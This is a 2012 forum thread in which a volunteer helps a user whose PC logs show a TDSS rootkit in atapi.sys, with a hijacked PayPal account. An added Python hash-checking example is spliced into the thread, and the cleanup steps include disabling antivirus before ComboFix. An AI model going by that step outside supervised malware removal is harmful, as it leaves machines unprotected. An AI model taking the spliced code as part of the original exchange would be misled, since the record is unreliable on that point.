Windows7 x64: Infected, hijacked? Don't really know


This topic is locked
19 replies to this topic

#1 Stillrain

  • Members
  • 9 posts

Posted 26 February 2012 - 08:06 PM

Hi!

Been having some trouble lately. I'm a webmaster, and recently a few of my websites have been infected (I learned about it through Google's warnings). I fixed those problems (or I thought I did), checked my machine with my anti-virus (BitDefender) and MalwareBytes AntiSpyware, and all was clean; I also tried Avast's aswMBR and found nothing. So I thought all was fine, only to find out today that some unauthorized activity has been taking place on my PayPal account: someone has been transferring funds out, so I'm really worried that my system has been compromised.

According to AVG, the only website scanner that detects anything wrong, the infection on my websites is "Link to Exploit Site" and "Blackhole Exploit Kit", in case that gives you any hint.

Here's the DDS log; I'm also attaching the ComboFix and TDSS logs. I couldn't run Rootkit Unhooker due to its self-integrity issues. Hope you can help me with this. Thanks a lot for your assistance!


.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421
Run by x-Daemon at 2:41:09 on 2012-02-27
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.34.1033.18.3957.1806 [GMT 2:00]
.
AV: BitDefender Antivirus *Disabled/Outdated* {50909708-FF80-02AF-F814-B28405891E92}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: BitDefender AntiSpyware *Disabled/Updated* {EBF176EC-D9BA-0D21-C2A4-89F67E0E542F}
FW: BitDefender Firewall *Enabled* {68AB162D-B5EF-03F7-D34B-1BB1FB5A59E9}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Program Files\BitDefender\BitDefender 2011\vsserv.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\STacSV64.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\WUDFHost.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\BitDefender\BitDefender 2011\updatesrv.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Program Files\BitDefender\BitDefender 2011\bdagent.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\Explorer.EXE
C:\Program Files\BitDefender\BitDefender 2011\pchooklaunch64.exe
C:\Program Files\BitDefender\BitDefender 2011\Antispam32\pchooklaunch32.exe
C:\Program Files (x86)\NETELLER app\NETELLER-app.exe
C:\Program Files (x86)\LaunchTab\LaunchTab.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\SearchIndexer.exe
C:\Windows\System32\alg.exe
C:\Program Files (x86)\VideoLAN\VLC\vlc.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\SysWOW64\rundll32.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\conhost.exe
C:\Windows\SysWOW64\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://notfound./
mStart Page = about:blank
BHO: AutorunsDisabled - No File
BHO: Internet Explorer Form-Fill Plug-In: {5425b4b8-87f9-4e9c-8b51-8aaba82eba64} - C:\Program Files (x86)\NETELLER app\plugins\IE\Neteller.dll
TB: Bitdefender Toolbar: {381ffde8-2394-4f90-b10d-fc6124a40f8c} - C:\Program Files\BitDefender\BitDefender 2011\Antispam32\IEToolbar.dll
uRun: [NETELLER app] "C:\Program Files (x86)\NETELLER app\NETELLER-app.exe" /BOOT
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2011\Antispam32\ieshow.exe"
StartupFolder: C:\Users\x-Daemon\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\LAUNCH~1.LNK - C:\Program Files (x86)\LaunchTab\LaunchTab.exe
mPolicies-system: ConsentPromptBehaviorAdmin = 5 (0x5)
mPolicies-system: ConsentPromptBehaviorUser = 3 (0x3)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
mPolicies-system: PromptOnSecureDesktop = 0 (0x0)
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} - hxxp://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_intel_4.5.3.0.cab
TCP: DhcpNameServer = 192.168.2.1
TCP: Interfaces\{D7C909BB-5170-4911-9FFB-A2252A258FE6} : DhcpNameServer = 192.168.2.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
BHO-X64: AutorunsDisabled - No File
BHO-X64: AcroIEHelperStub - No File
BHO-X64: URLRedirectionBHO - No File
BHO-X64: Internet Explorer Form-Fill Plug-In: {5425B4B8-87F9-4E9C-8B51-8AABA82EBA64} - C:\Program Files (x86)\NETELLER app\plugins\IE\Neteller.dll
BHO-X64: NetellerBHO - No File
TB-X64: Bitdefender Toolbar: {381FFDE8-2394-4F90-B10D-FC6124A40F8C} - C:\Program Files\BitDefender\BitDefender 2011\Antispam32\IEToolbar.dll
mRun-x64: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun-x64: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2011\Antispam32\ieshow.exe"
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\x-Daemon\AppData\Roaming\Mozilla\Firefox\Profiles\jqxdytkc.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/ncr
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\4.1.10111.0\npctrlui.dll
FF - plugin: C:\Users\x-Daemon\AppData\Local\Google\Update\1.3.21.79\npGoogleUpdate3.dll
FF - plugin: C:\Users\x-Daemon\AppData\Roaming\Mozilla\Firefox\Profiles\jqxdytkc.default\extensions\{1392b8d2-5c05-419f-a8f6-b9f15a596612}\plugins\np-mswmp.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll
.
============= SERVICES / DRIVERS ===============
.
R1 Bdfndisf;BitDefender Firewall NDIS 6 Filter Driver;C:\Program Files\Common Files\BitDefender\BitDefender Firewall\bdfndisf6.sys [2010-8-20 88144]
R1 bdfwfpf;bdfwfpf;C:\Program Files\Common Files\BitDefender\BitDefender Firewall\bdfwfpf.sys [2010-8-20 99408]
R1 vwififlt;Virtual WiFi Filter Driver;C:\Windows\system32\DRIVERS\vwififlt.sys --> C:\Windows\system32\DRIVERS\vwififlt.sys [?]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\system32\atiesrxx.exe --> C:\Windows\system32\atiesrxx.exe [?]
R2 Updatesrv;BitDefender Desktop Update Service;C:\Program Files\BitDefender\BitDefender 2011\updatesrv.exe [2012-1-1 53224]
R3 Acceler;Accelerometer Service;C:\Windows\system32\DRIVERS\Acceler.sys --> C:\Windows\system32\DRIVERS\Acceler.sys [?]
R3 amdkmdag;amdkmdag;C:\Windows\system32\DRIVERS\atikmdag.sys --> C:\Windows\system32\DRIVERS\atikmdag.sys [?]
R3 amdkmdap;amdkmdap;C:\Windows\system32\DRIVERS\atikmpag.sys --> C:\Windows\system32\DRIVERS\atikmpag.sys [?]
R3 bdfm;bdfm;C:\Windows\system32\DRIVERS\bdfm.sys --> C:\Windows\system32\DRIVERS\bdfm.sys [?]
R3 HECIx64;Intel® Management Engine Interface;C:\Windows\system32\DRIVERS\HECIx64.sys --> C:\Windows\system32\DRIVERS\HECIx64.sys [?]
R3 O2MDGRDR;O2MDGRDR;C:\Windows\system32\DRIVERS\o2mdgx64.sys --> C:\Windows\system32\DRIVERS\o2mdgx64.sys [?]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\system32\DRIVERS\Rt64win7.sys --> C:\Windows\system32\DRIVERS\Rt64win7.sys [?]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S3 AESTFilters;Andrea ST Filters Service;C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [2011-12-31 89600]
S3 avc3;avc3;C:\Windows\system32\DRIVERS\avc3.sys --> C:\Windows\system32\DRIVERS\avc3.sys [?]
S3 avckf;avckf;C:\Windows\system32\DRIVERS\avckf.sys --> C:\Windows\system32\DRIVERS\avckf.sys [?]
S3 MEMSWEEP2;MEMSWEEP2;\??\C:\Windows\system32\C1B7.tmp --> C:\Windows\system32\C1B7.tmp [?]
S3 nmwcdcx64;Nokia USB Generic;C:\Windows\system32\drivers\ccdcmbox64.sys --> C:\Windows\system32\drivers\ccdcmbox64.sys [?]
S3 nmwcdx64;Nokia USB Phone Parent;C:\Windows\system32\drivers\ccdcmbx64.sys --> C:\Windows\system32\drivers\ccdcmbx64.sys [?]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-1-9 174440]
S3 osppsvc;Office Software Protection Platform;C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-1-9 4925184]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\system32\drivers\rdpvideominiport.sys --> C:\Windows\system32\drivers\rdpvideominiport.sys [?]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\system32\drivers\tsusbflt.sys --> C:\Windows\system32\drivers\tsusbflt.sys [?]
S3 Update Server;BitDefender Update Server v2;C:\Program Files\Common Files\BitDefender\BitDefender Arrakis Server\bin\arrakis3.exe [2010-11-30 467248]
S3 vwifimp;Microsoft Virtual WiFi Miniport Service;C:\Windows\system32\DRIVERS\vwifimp.sys --> C:\Windows\system32\DRIVERS\vwifimp.sys [?]
S4 AdobeARMservice;Adobe Acrobat Update Service;C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2011-6-6 64952]
S4 ReflectService.exe;Macrium Reflect Image Mounting Service;C:\Program Files\Macrium Reflect\ReflectService.exe [2011-12-22 301720]
S4 SwitchBoard;SwitchBoard;C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-2-19 517096]
.
=============== Created Last 30 ================
.
2012-02-27 00:31:36 34560 ----a-w- C:\Windows\SysWow64\drivers\Normandy.sys
2012-02-27 00:31:02 -------- d-----w- C:\Windows\SysWow64\rootkitunhookeijr30
2012-02-27 00:27:17 35712 ----a-w- C:\Windows\SysWow64\drivers\BlackBox.sys
2012-02-27 00:15:01 -------- d-sh--w- C:\$RECYCLE.BIN
2012-02-27 00:03:33 0 ----a-w- C:\Windows\SysWow64\wnlogon.sys
2012-02-26 23:54:53 98816 ----a-w- C:\Windows\sed.exe
2012-02-26 23:54:53 518144 ----a-w- C:\Windows\SWREG.exe
2012-02-26 23:54:53 256000 ----a-w- C:\Windows\PEV.exe
2012-02-26 23:54:53 208896 ----a-w- C:\Windows\MBR.exe
2012-02-25 21:12:14 -------- d-----w- C:\Program Files (x86)\Free YouTube Downloader
2012-02-25 20:55:16 -------- d-----w- C:\Program Files (x86)\Conduit
2012-02-25 20:55:10 -------- d-----w- C:\Users\x-Daemon\AppData\Local\Conduit
2012-02-25 20:53:40 -------- d-----w- C:\Users\x-Daemon\AppData\Local\FLVService
2012-02-20 20:24:34 -------- d-----w- C:\Users\x-Daemon\AppData\Roaming\MarketSamurai.6E37012E1CBD7F47B14488FCC715944F3EBDCEDC.1
2012-02-20 20:23:01 -------- d-----w- C:\Program Files (x86)\MarketSamurai
2012-02-20 17:10:23 -------- d-----w- C:\Users\x-Daemon\AppData\Roaming\NETELLER app
2012-02-20 17:10:21 -------- d-----w- C:\Program Files (x86)\NETELLER app
2012-02-18 02:14:50 6144 ------w- C:\Windows\System32\C1B7.tmp
2012-02-18 02:13:39 6144 ------w- C:\Windows\System32\AA30.tmp
2012-02-18 02:13:20 -------- d-----w- C:\Program Files (x86)\Sophos
2012-02-15 01:00:59 887296 ----a-w- C:\Program Files\Internet Explorer\iedvtool.dll
2012-02-14 23:16:54 509952 ----a-w- C:\Windows\System32\ntshrui.dll
2012-02-14 23:16:54 442880 ----a-w- C:\Windows\SysWow64\ntshrui.dll
2012-02-14 23:16:48 515584 ----a-w- C:\Windows\System32\timedate.cpl
2012-02-14 23:16:48 478720 ----a-w- C:\Windows\SysWow64\timedate.cpl
2012-02-14 23:16:47 3145728 ----a-w- C:\Windows\System32\win32k.sys
2012-02-14 23:16:46 498688 ----a-w- C:\Windows\System32\drivers\afd.sys
2012-02-14 23:16:41 690688 ----a-w- C:\Windows\SysWow64\msvcrt.dll
2012-02-14 23:16:41 634880 ----a-w- C:\Windows\System32\msvcrt.dll
2012-02-12 00:58:31 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{B38F1C45-7A69-4336-80C3-CA339F28F6FB}
2012-02-12 00:57:55 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{AAEB9810-4FCD-47E6-B2D7-BE620AFBA36D}
2012-02-06 23:59:50 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{A8520229-FBBE-4345-9275-D60079F806D1}
2012-02-06 23:59:32 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{C3D30DE0-FA31-464D-A9AB-F5E73680D32B}
2012-02-06 16:40:37 -------- d-----w- C:\Users\x-Daemon\AppData\Roaming\Affilorama
2012-02-06 16:40:31 -------- d-----w- C:\Program Files (x86)\Traffic Travis v4
2012-02-04 23:19:06 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{A2688718-4199-459B-B418-EFA3F30C5BE6}
2012-02-04 23:18:47 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{E8E4AF41-D36E-4DCE-89A6-DC5DBE0F92EF}
2012-02-01 13:21:40 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{A5D1BC02-C0A7-4508-B91E-9ACDDF683301}
2012-02-01 13:21:22 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{A1282E54-08E9-4173-AB5C-15A4E85496C7}
2012-02-01 13:21:22 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{13C57D52-1D06-4E4B-AD48-63A615787450}
2012-01-29 12:33:03 -------- d-----w- C:\ProgramData\eMule
2012-01-29 12:32:38 -------- d-----w- C:\Users\x-Daemon\AppData\Local\eMule
2012-01-29 12:32:35 -------- d-----w- C:\Program Files (x86)\eMule
.
==================== Find3M ====================
.
2012-02-22 21:40:55 414368 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2012-01-06 19:21:56 31344 ----a-w- C:\Windows\System32\drivers\cnnctfy2.sys
2012-01-01 12:20:39 175616 ----a-w- C:\Windows\System32\msclmd.dll
2012-01-01 12:20:39 152576 ----a-w- C:\Windows\SysWow64\msclmd.dll
2011-12-31 23:41:37 76659 ----a-w- C:\ProgramData\bdinstall.bin
2011-12-31 22:09:19 0 ----a-w- C:\Windows\ativpsrm.bin
2011-12-22 14:54:52 13464 ----a-w- C:\Windows\System32\drivers\PSVolAcc.sys
2011-12-22 14:54:44 43672 ----a-w- C:\Windows\System32\drivers\psmounter.sys
2011-12-19 06:31:00 160256 ----a-w- C:\Windows\SysWow64\xvid.ax
2011-12-19 06:29:40 644608 ----a-w- C:\Windows\SysWow64\xvidcore.dll
2011-12-19 06:27:16 236544 ----a-w- C:\Windows\SysWow64\xvidvfw.dll
2011-12-14 07:11:03 2308096 ----a-w- C:\Windows\System32\jscript9.dll
2011-12-14 07:04:30 1390080 ----a-w- C:\Windows\System32\wininet.dll
2011-12-14 07:03:38 1493504 ----a-w- C:\Windows\System32\inetcpl.cpl
2011-12-14 06:57:28 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2011-12-14 03:04:54 1798656 ----a-w- C:\Windows\SysWow64\jscript9.dll
2011-12-14 02:57:18 1127424 ----a-w- C:\Windows\SysWow64\wininet.dll
2011-12-14 02:56:58 1427456 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2011-12-14 02:50:04 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2011-12-10 14:24:08 23152 ----a-w- C:\Windows\System32\drivers\mbam.sys
2011-12-03 06:41:18 201728 ----a-w- C:\Windows\SysWow64\mp4decoder.dll
2010-07-08 09:37:14 101544 ----a-w- C:\Program Files\Common Files\LinkInstaller.exe
.
============= FINISH: 2:43:16,83 ===============


#2 m0le

    Can U Dig It?

  • Malware Response Team
  • 34,527 posts
  • Gender:Male
  • Location:London, UK

Posted 29 February 2012 - 06:42 PM

Hi,

Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.
  • Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

  • Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

  • Please reply to this post so I know you are there.
The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks :thumbup2:
m0le is a proud member of UNITE

#3 Stillrain
  • Topic Starter

  • Members
  • 9 posts

Posted 01 March 2012 - 01:28 PM

Hi m0le, I'm here, thanks!

#4 m0le

    Can U Dig It?

  • Malware Response Team
  • 34,527 posts
  • Gender:Male
  • Location:London, UK

Posted 01 March 2012 - 08:41 PM

Please note: ComboFix is an extremely powerful tool which should only be used when instructed to do so by someone who has been properly trained. ComboFix is intended by its creator to be "used under the guidance and supervision of an expert." It is NOT for private use. Please read Combofix's Disclaimer.

Using this tool incorrectly could lead to disastrous problems with your operating system such as preventing it from ever starting again.


The ComboFix log shows an infected file. We will look for a backup copy to replace it first and, depending on the TDSS variant you have, we may have to search down the real core problem.

Please download SystemLook from the link below and save it to your Desktop.
Download Mirror #1
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :filefind
    atapi.sys
    
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt

#5 Stillrain
  • Topic Starter

  • Members
  • 9 posts

Posted 01 March 2012 - 09:49 PM

Hi m0le, thanks for your assistance, here's the log:


SystemLook 27.08.10 by jpshortstuff
Log created at 04:42 on 02/03/2012 by x-Daemon
Administrator - Elevation successful

========== filefind ==========

Searching for "atapi.sys"
C:\Windows\ERDNT\cache64\atapi.sys --a---- 24128 bytes [00:17 27/02/2012] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\System32\drivers\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_neutral_aad30bdeec04ea5e\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.16385_none_392d19c13b3ad543\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.20575_none_39c1885e54505643\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_3b5e2d89382958dd\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C

-= EOF =-




So, this could be responsible for the PayPal account hijacking? Is the system and all the accounts I access through it compromised by this?

Thanks again.

Edited by Stillrain, 01 March 2012 - 09:49 PM.
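As an added example (not part of this thread, and not code from SystemLook, ComboFix or any other tool mentioned here), a small Python checker that parses the SystemLook filefind output above, takes the hash that the DriverStore, winsxs and ERDNT copies agree on as the reference, flags the in-use System32\drivers copy when its hash differs, and names a winsxs copy to restore from. The six log lines are the ones posted above; the tampered log is constructed, with an all-F placeholder hash.

```python
import re
from collections import Counter

# Shape of a SystemLook ":filefind" result line, as in the log above:
#   <path> <attrs> <size> bytes [<modified>] [<created>] <MD5>
FILEFIND_RE = re.compile(
    r"^(?P<path>.+?)\s+(?P<attrs>[-a-z]{7})\s+(?P<size>\d+) bytes\s+"
    r"\[(?P<modified>[^\]]+)\]\s+\[(?P<created>[^\]]+)\]\s+(?P<md5>[0-9A-Fa-f]{32})$"
)

# The six file lines are the SystemLook output posted in this thread.
CLEAN_LOG = r"""
Searching for "atapi.sys"
C:\Windows\ERDNT\cache64\atapi.sys --a---- 24128 bytes [00:17 27/02/2012] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\System32\drivers\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_neutral_aad30bdeec04ea5e\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.16385_none_392d19c13b3ad543\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.20575_none_39c1885e54505643\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_3b5e2d89382958dd\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
-= EOF =-
"""

# Constructed variant: the same log, but the in-use copy carries an all-F
# placeholder hash that no reference copy shares (what a patched driver looks like).
TAMPERED_LOG = "\n".join(
    line[:-32] + "F" * 32 if "\\System32\\drivers\\" in line else line
    for line in CLEAN_LOG.splitlines()
)


def parse_filefind(log_text):
    """Return one dict per file line; header, footer and blank lines are skipped."""
    entries = []
    for line in log_text.splitlines():
        m = FILEFIND_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["size"] = int(d["size"])
            d["md5"] = d["md5"].upper()
            entries.append(d)
    return entries


def is_reference_copy(path):
    """Copies in the DriverStore, the winsxs component store and the ComboFix
    ERDNT cache are not loaded by the kernel, so they serve as reference copies."""
    p = path.lower()
    return "\\driverstore\\" in p or "\\winsxs\\" in p or "\\erdnt\\" in p


def check_live_driver(log_text, live_dir="c:\\windows\\system32\\drivers\\"):
    """Compare the in-use driver against the hash the reference copies agree on.

    verdict is 'clean', 'mismatch', or 'undetermined' (no live or reference copy
    found). restore_source names a winsxs copy carrying the reference hash.
    """
    entries = parse_filefind(log_text)
    refs = [e for e in entries if is_reference_copy(e["path"])]
    live = [e for e in entries if e["path"].lower().startswith(live_dir)]
    result = {"verdict": "undetermined", "reference_md5": None,
              "live_md5": None, "restore_source": None}
    if not refs or not live:
        return result
    # Majority vote across reference copies guards against a single stale copy.
    ref_md5 = Counter(e["md5"] for e in refs).most_common(1)[0][0]
    result["reference_md5"] = ref_md5
    result["live_md5"] = live[0]["md5"]
    result["verdict"] = "clean" if live[0]["md5"] == ref_md5 else "mismatch"
    for e in refs:
        if e["md5"] == ref_md5 and "\\winsxs\\" in e["path"].lower():
            result["restore_source"] = e["path"]
            break
    return result


if __name__ == "__main__":
    for name, log in (("posted log", CLEAN_LOG), ("constructed log", TAMPERED_LOG)):
        r = check_live_driver(log)
        print(f"{name}: {r['verdict']} (live {r['live_md5']}, reference {r['reference_md5']})")
```

A hash comparison made from inside a running system can be filtered by a kernel-mode rootkit, so an all-identical result such as the one in this log is necessary but not sufficient evidence of a clean driver; in this thread the ComboFix log flagged the file regardless. Running the same comparison from an offline boot environment removes that caveat.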


#6 m0le

    Can U Dig It?

  • Malware Response Team
  • 34,527 posts
  • Gender:Male
  • Location:London, UK

Posted 02 March 2012 - 06:48 PM

Yes, the atapi.sys driver infection allows the rootkit to take over the system and TDSS is a backdoor/trojan capable of password stealing.

Because of this I have to provide this disclaimer

One or more of the identified infections is a backdoor trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable, and it would be wise to contact those same financial institutions to apprise them of your situation.

Though the trojan has been identified and can be killed, because of its backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall

We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do.


If you are still happy to go ahead...

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

3. Open notepad and copy/paste the text in the box below into it:

FCopy::
